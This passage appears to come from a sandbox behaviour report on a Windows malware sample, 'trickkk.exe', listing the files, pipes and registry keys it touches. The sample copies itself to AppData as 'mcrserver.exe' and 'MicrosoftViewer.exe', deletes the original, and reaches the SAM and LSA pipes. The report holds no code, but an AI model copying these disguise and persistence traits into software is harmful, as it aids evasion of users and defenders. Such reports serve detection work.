\??\{684BB8B6-2793-49A5-8012-E0A941B4B4DF}
\??\{78032B7E-4968-42D3-9F37-287EA86C0AAA}
\??\{CFE0B7CF-841E-4D51-AC07-A628D1182330}
C:\Windows\sysnative\eventvwr.msc
C:\Windows\sysnative\shell32.dll
C:\Users\Seven01\AppData\Local\Microsoft\Windows\Caches
C:\Users\Seven01\AppData\Local\Microsoft\Windows\Caches\cversions.1.db
C:\Users\Seven01\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000019.db
C:\Users\Seven01\Desktop\desktop.ini
C:\Windows\sysnative
C:\Windows\sysnative\eventvwr.msc:Zone.Identifier
C:\Windows\sysnative\cmd.exe
C:\Users\Seven01\AppData\Local\Temp\"C:\Users\Seven01\AppData\Roaming\mcrserver.exe"
C:\Users\Seven01\AppData\Roaming\mcrserver.exe.config
C:\Users\Seven01\AppData\Roaming\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Users\Seven01\AppData\Roaming\mcrserver.exe.Local\
C:\Users\Seven01\AppData\Roaming
C:\Users\Seven01\AppData\Roaming\mcrserver.INI
C:\Users\Seven01\AppData\Roaming\it-IT\mscorlib.resources.dll
C:\Users\Seven01\AppData\Roaming\it-IT\mscorlib.resources\mscorlib.resources.dll
C:\Users\Seven01\AppData\Roaming\it-IT\mscorlib.resources.exe
C:\Users\Seven01\AppData\Roaming\it-IT\mscorlib.resources\mscorlib.resources.exe
C:\Users\Seven01\AppData\Roaming\MetaData\
C:\Users\Seven01\AppData\Roaming\MS_Security_Center\
C:\Users\Seven01\AppData\Roaming\MicrosoftViewer.exe
C:\Users\Seven01\AppData\Roaming\it-IT\trickkk.resources.dll
C:\Users\Seven01\AppData\Roaming\it-IT\trickkk.resources\trickkk.resources.dll
C:\Users\Seven01\AppData\Roaming\it-IT\trickkk.resources.exe
C:\Users\Seven01\AppData\Roaming\it-IT\trickkk.resources\trickkk.resources.exe
C:\Users\Seven01\AppData\Roaming\it\trickkk.resources.dll
C:\Users\Seven01\AppData\Roaming\it\trickkk.resources\trickkk.resources.dll
C:\Users\Seven01\AppData\Roaming\it\trickkk.resources.exe
C:\Users\Seven01\AppData\Roaming\it\trickkk.resources\trickkk.resources.exe
C:\Windows\assembly\GAC_64\System.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Windows\assembly\GAC_MSIL\System.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Windows\assembly\GAC\System.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Users\Seven01\AppData\Roaming\it-IT\System.resources.dll
C:\Users\Seven01\AppData\Roaming\it-IT\System.resources\System.resources.dll
C:\Users\Seven01\AppData\Roaming\it-IT\System.resources.exe
C:\Users\Seven01\AppData\Roaming\it-IT\System.resources\System.resources.exe
C:\Windows\assembly\GAC_64\System.resources\2.0.0.0_it_b77a5c561934e089
C:\Windows\assembly\GAC_MSIL\System.resources\2.0.0.0_it_b77a5c561934e089
C:\Windows\assembly\GAC_MSIL\System.resources\2.0.0.0_it_b77a5c561934e089\System.resources.dll
C:\Windows\assembly\GAC_MSIL\System.resources\2.0.0.0_it_b77a5c561934e089\System.resources.INI
C:\Users\Seven01\AppData\Local\Temp\net.*
C:\Users\Seven01\AppData\Local\Temp\net
C:\ProgramData\Oracle\Java\javapath\net.*
C:\ProgramData\Oracle\Java\javapath\net
C:\Windows\sysnative\net.*
C:\Windows\sysnative\net.COM
C:\Windows\sysnative\net.exe
C:\Windows\sysnative\WSHTCPIP.DLL
C:\Windows\sysnative\wship6.dll
C:\Windows\sysnative\wshqos.dll
C:\Users\Seven01\AppData\Local\Temp\powercfg.*
C:\Users\Seven01\AppData\Local\Temp\powercfg
C:\ProgramData\Oracle\Java\javapath\powercfg.*
C:\ProgramData\Oracle\Java\javapath\powercfg
C:\Windows\sysnative\powercfg.*
C:\Windows\sysnative\powercfg.COM
C:\Windows\sysnative\powercfg.exe
C:\Users\Seven01\AppData\Local\Temp\reg.*
C:\Users\Seven01\AppData\Local\Temp\reg
C:\ProgramData\Oracle\Java\javapath\reg.*
C:\ProgramData\Oracle\Java\javapath\reg
C:\Windows\sysnative\reg.*
C:\Windows\sysnative\reg.COM
C:\Windows\sysnative\reg.exe
C:\Windows\sysnative\netmsg.dll
\??\PIPE\lsarpc

Read Files

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll
C:\Users\Seven01\AppData\Local\Temp\trickkk.exe.config
C:\Users\Seven01\AppData\Local\Temp\trickkk.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorwks.dll
C:\Windows\winsxs\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_88dcc0bf2fb1b808\msvcr80.dll
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\machine.config
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch
C:\Windows\assembly\NativeImages_v2.0.50727_64\index148.dat
C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\9469491f37d9c35b596968b206615309\mscorlib.ni.dll
C:\Windows\sysnative\l_intl.nls
\Device\KsecDD
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorjit.dll
C:\Windows\assembly\pubpol21.dat
C:\Windows\assembly\NativeImages_v2.0.50727_64\System\adff7dd9fe8e541775c46b6363401b22\System.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Drawing\5910828a337dbe848dc90c7ae0a7dee2\System.Drawing.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Windows.Forms\6c352ff9e3603b0e69d969ff7e7632f5\System.Windows.Forms.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Management\c44929bde355680c886f8a52f5e22b81\System.Management.ni.dll
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\wminet_utils.dll
C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Culture.dll
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\it\mscorrc.dll
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Configuration\091b931d0f6408001747dbbbb05dbe66\System.Configuration.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Xml\ee795155543768ea67eecddc686a1e9e\System.Xml.ni.dll
C:\Windows\sysnative\tzres.dll
C:\Windows\sysnative\it-IT\KERNELBASE.dll.mui
C:\Windows\sysnative\wbem\WmiPrvSE.exe
\??\PIPE\samr
C:\Windows\sysnative\wbem\repository\MAPPING1.MAP
C:\Windows\sysnative\wbem\repository\MAPPING2.MAP
C:\Windows\sysnative\wbem\repository\MAPPING3.MAP
C:\Windows\sysnative\wbem\repository\OBJECTS.DATA
C:\Windows\sysnative\wbem\repository\INDEX.BTR
\??\pipe\PIPE_EVENTROOT\CIMV2PROVIDERSUBSYSTEM
\??\pipe\PIPE_EVENTROOT\CIMV2WMI SELF-INSTRUMENTATION EVENT PROVIDER
C:\Windows\Globalization\Sorting\sortdefault.nls
\??\WMIDataDevice
\??\ide#diskvbox_harddisk___________________________1.0_____#5&33d1638a&0&0.0.0#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
\??\{71F897D7-EB7C-4D8D-89DB-AC80D9DD2270}
\??\{29898C9D-B0A4-4FEF-BDB6-57A562022CEE}
\??\{E43D242B-9EAB-4626-A952-46649FBB939A}
\??\{DF4A9D2C-8742-4EB1-8703-D395C4183F33}
\??\{8E301A52-AFFA-4F49-B9CA-C79096A1A056}
\??\{9A399D81-2EAD-4F23-BCDD-637FC13DCD51}
\??\{5BF54C7E-91DA-457D-80BF-333677D7E316}
\??\{C2D43895-0262-4873-A789-C2F96D24B693}
\??\{2CAA64ED-BAA3-4473-B637-DEC65A14C8AA}
\??\{684BB8B6-2793-49A5-8012-E0A941B4B4DF}
\??\{78032B7E-4968-42D3-9F37-287EA86C0AAA}
\??\{CFE0B7CF-841E-4D51-AC07-A628D1182330}
C:\Windows\sysnative\shell32.dll
C:\Users\Seven01\AppData\Local\Microsoft\Windows\Caches\cversions.1.db
C:\Users\Seven01\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000019.db
C:\Users\Seven01\Desktop\desktop.ini
C:\Windows\sysnative\cmd.exe
C:\Users\Seven01\AppData\Roaming\mcrserver.exe.config
C:\Users\Seven01\AppData\Roaming\mcrserver.exe
C:\Windows\assembly\GAC_MSIL\System.resources\2.0.0.0_it_b77a5c561934e089\System.resources.dll
C:\Windows\sysnative\wship6.dll
C:\Windows\sysnative\wshqos.dll
C:\Windows\sysnative\netmsg.dll
\??\PIPE\lsarpc

Write Files

C:\Users\Seven01\AppData\Roaming\mcrserver.exe
\??\PIPE\samr
C:\Windows\sysnative\wbem\repository\WRITABLE.TST
C:\Windows\sysnative\wbem\repository\MAPPING1.MAP
C:\Windows\sysnative\wbem\repository\MAPPING2.MAP
C:\Windows\sysnative\wbem\repository\MAPPING3.MAP
C:\Windows\sysnative\wbem\repository\OBJECTS.DATA
C:\Windows\sysnative\wbem\repository\INDEX.BTR
\??\pipe\PIPE_EVENTROOT\CIMV2PROVIDERSUBSYSTEM
\??\pipe\PIPE_EVENTROOT\CIMV2WMI SELF-INSTRUMENTATION EVENT PROVIDER
\??\WMIDataDevice
C:\Users\Seven01\AppData\Roaming\MicrosoftViewer.exe
\??\PIPE\lsarpc

Delete Files

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.2092.10866375
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.2092.10866375
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.2092.10866437
C:\Users\Seven01\AppData\Local\Temp\trickkk.exe
C:\Users\Seven01\AppData\Roaming\mcrserver.exe

Keys

HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\v4.0
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\CLRLoadLogDir
HKEY_CURRENT_USER\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\OnlyUseLatestCLR
Policy\Standards
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\Standards
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\standards\v2.0.50727
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\GCStressStart
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\GCStressStartAtJit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\AppPatch
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000\mscorwks.dll
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\trickkk.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_CURRENT_USER\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\VersioningLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\Internet
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\LocalIntranet
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1822907384-1282624486-319450072-1000
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\v2.0.50727\Security\Policy
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\LatestIndex
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\index148
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\index148\NIUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\index148\ILUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\181938c6\7950e2c5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\181938c6\7950e2c5\82
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\181938c6\7950e2c5\82\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\181938c6\7950e2c5\82\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\181938c6\7950e2c5\82\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\181938c6\7950e2c5\82\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\181938c6\7950e2c5\82\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\181938c6\7950e2c5\82\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\181938c6\7950e2c5\82\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\181938c6\7950e2c5\82\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\181938c6\7950e2c5\82\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7950e2c5\19b8f67f\82
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7950e2c5\19b8f67f\82\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7950e2c5\19b8f67f\82\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7950e2c5\19b8f67f\82\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7950e2c5\19b8f67f\82\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7950e2c5\19b8f67f\82\LastModTime
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\GACChangeNotification\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\mscorlib,2.0.0.0,,b77a5c561934e089,AMD64
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7a68a774\629de426
HKEY_LOCAL_MACHINE\Software\Microsoft\StrongName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\CseOn
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\TailCallOpt
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\PInvokeInline
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\PInvokeCalliOpt
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\NewGCCalc
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\TURNOFFDEBUGINFO
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\DisableHotCold
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\internal\jit\Perf
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\PublisherPolicy\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index21
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Windows.Forms__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\61e7e666\c991064
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\61e7e666\c991064\83
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\61e7e666\c991064\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\61e7e666\c991064\83\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\61e7e666\c991064\83\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\61e7e666\c991064\83\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\61e7e666\c991064\83\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\61e7e666\c991064\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\61e7e666\c991064\83\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\61e7e666\c991064\83\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\61e7e666\c991064\83\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\475dce40\2d382ce6\8d
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\475dce40\2d382ce6\8d\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\475dce40\2d382ce6\8d\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\475dce40\2d382ce6\8d\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\475dce40\2d382ce6\8d\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\475dce40\2d382ce6\8d\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\19ab8d57\1bd7b0d8\8f
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\19ab8d57\1bd7b0d8\8f\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\19ab8d57\1bd7b0d8\8f\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\19ab8d57\1bd7b0d8\8f\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\19ab8d57\1bd7b0d8\8f\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\19ab8d57\1bd7b0d8\8f\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\2dd6ac50\163e1f5e\8a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\2dd6ac50\163e1f5e\8a\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\2dd6ac50\163e1f5e\8a\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\2dd6ac50\163e1f5e\8a\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\2dd6ac50\163e1f5e\8a\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\2dd6ac50\163e1f5e\8a\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\424bd4d8\1c83327b\8e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\424bd4d8\1c83327b\8e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\424bd4d8\1c83327b\8e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\424bd4d8\1c83327b\8e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\424bd4d8\1c83327b\8e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\424bd4d8\1c83327b\8e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\41c04c7e\7f3b6ac4\80
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\41c04c7e\7f3b6ac4\80\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\41c04c7e\7f3b6ac4\80\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\41c04c7e\7f3b6ac4\80\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\41c04c7e\7f3b6ac4\80\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\41c04c7e\7f3b6ac4\80\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3ced59c5\1b2590b1\85
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3ced59c5\1b2590b1\85\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3ced59c5\1b2590b1\85\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3ced59c5\1b2590b1\85\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3ced59c5\1b2590b1\85\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3ced59c5\1b2590b1\85\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\c991064\2bd33e1c\81
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\c991064\2bd33e1c\81\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\c991064\2bd33e1c\81\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\c991064\2bd33e1c\81\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\c991064\2bd33e1c\81\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\c991064\2bd33e1c\81\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\30bc7c4f\3f50fe4f\90
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\30bc7c4f\3f50fe4f\90\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\30bc7c4f\3f50fe4f\90\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\30bc7c4f\3f50fe4f\90\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\30bc7c4f\3f50fe4f\90\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\30bc7c4f\3f50fe4f\90\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\30bc7c4f\3f50fe4f\90\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\30bc7c4f\3f50fe4f\90\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\30bc7c4f\3f50fe4f\90\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\30bc7c4f\3f50fe4f\90\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3f50fe4f\6f1da7aa\90
